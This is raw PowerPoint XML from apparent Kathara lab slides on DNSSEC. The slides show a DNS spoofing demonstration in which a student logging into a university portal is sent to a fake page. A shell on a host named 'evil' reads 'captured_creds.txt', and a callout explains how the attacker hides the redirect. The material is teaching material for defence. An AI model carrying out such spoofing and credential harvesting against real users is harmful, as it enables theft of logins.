            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66A9A6FB-C6EA-D45B-C760-B7A7DB250C7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C154D477-27E0-7774-D23C-F6269593F1E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5838858" y="1868398"/>
            <a:ext cx="2782277" cy="1421068"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -104244"/>
              <a:gd name="adj2" fmla="val -63765"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>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0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>type "www.uniroma3.it" as the URL in the search bar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40378066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B403625-A0ED-B604-D65A-722241D950A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Segnaposto contenuto 6" descr="Immagine che contiene testo, schermata, Software multimediale, software&#10;&#10;Il contenuto generato dall'IA potrebbe non essere corretto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22207566-239C-BD97-BDF6-B44069170EB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84317" y="1259632"/>
            <a:ext cx="8823366" cy="5173699"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD45A4FE-0FDA-98F9-124C-E9A0D8D3ACDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B227D3F8-ADB0-7D89-800A-1BF0ED076365}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{132BE253-AD55-1AB0-149B-5DBF11ADEAB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1476270" y="2696702"/>
            <a:ext cx="2782277" cy="732298"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 75021"/>
              <a:gd name="adj2" fmla="val 147049"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>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0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>enter the student's ID number</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC4DD260-AC4F-3296-2EC9-0AE46B8AFE6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6737775" y="3632866"/>
            <a:ext cx="2782277" cy="732298"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -99549"/>
              <a:gd name="adj2" fmla="val 75004"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>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0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>enter the student's password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{215DD7EE-ABF7-1AE6-BB0C-A6F9C5B277A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1581905" y="5232219"/>
            <a:ext cx="2782277" cy="732298"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 105752"/>
              <a:gd name="adj2" fmla="val -95269"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>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0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>access the student's reserved area</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4627022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1C94471-3B44-C7AE-C4FC-3B864490C056}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Segnaposto contenuto 6" descr="Immagine che contiene testo, schermata, Software multimediale, software&#10;&#10;Il contenuto generato dall'IA potrebbe non essere corretto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0152DABC-A532-D363-FFC6-6DEE818796D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11928" y="1259632"/>
            <a:ext cx="8645236" cy="5202162"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92170A47-A081-8C5A-A737-47EDC076B5E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD030900-D07D-22D0-90C5-C5614A83E7D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{041047B7-B373-3B53-F96B-877A4EE667FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="421677" y="3231090"/>
            <a:ext cx="3594494" cy="1685293"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 60154"/>
              <a:gd name="adj2" fmla="val -130581"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>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0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The hacker redirected the user to the correct web page, so that the user would not notice the attack.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37452399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60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D52C1193-E72F-9504-F8A2-1C3CD7C9A60A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>lab configuration without </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Subtitle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E8EC977-9CBD-1D4F-3EC0-FBD3CCAC19D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8702B147-66D9-7E32-FBC6-1FEA9983C900}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55B20638-857F-CDA0-A7AB-B7FA27D590B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="340138906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7C80D0-FE9E-AA62-22E6-9C423653639C}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E967133-571D-167F-104C-ABDFBF41F451}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="987993" y="2668276"/>
            <a:ext cx="10216014" cy="1521448"/>
            <a:chOff x="1364266" y="2378845"/>
            <a:chExt cx="10216014" cy="1521448"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{900BC650-F981-13F5-7376-153F7999E59B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1364266" y="2668294"/>
              <a:ext cx="10216014" cy="1231999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="40000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="t"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cat /var/www/html/captured_creds.txt</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69A04752-4D4E-3C0E-8D3F-DB14F31C0346}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1364266" y="2378845"/>
              <a:ext cx="10216014" cy="286249"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4472C4"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="25400" algn="l" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="32000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" kern="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="37" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFC66F49-12DF-A644-C42D-696931842E8C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10920536" y="2466851"/>
              <a:ext cx="581348" cy="126235"/>
              <a:chOff x="8092857" y="2115830"/>
              <a:chExt cx="581348" cy="126235"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38" name="Rectangle 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BA01C13-B5BA-1005-1C2C-FEFE7621FCBC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
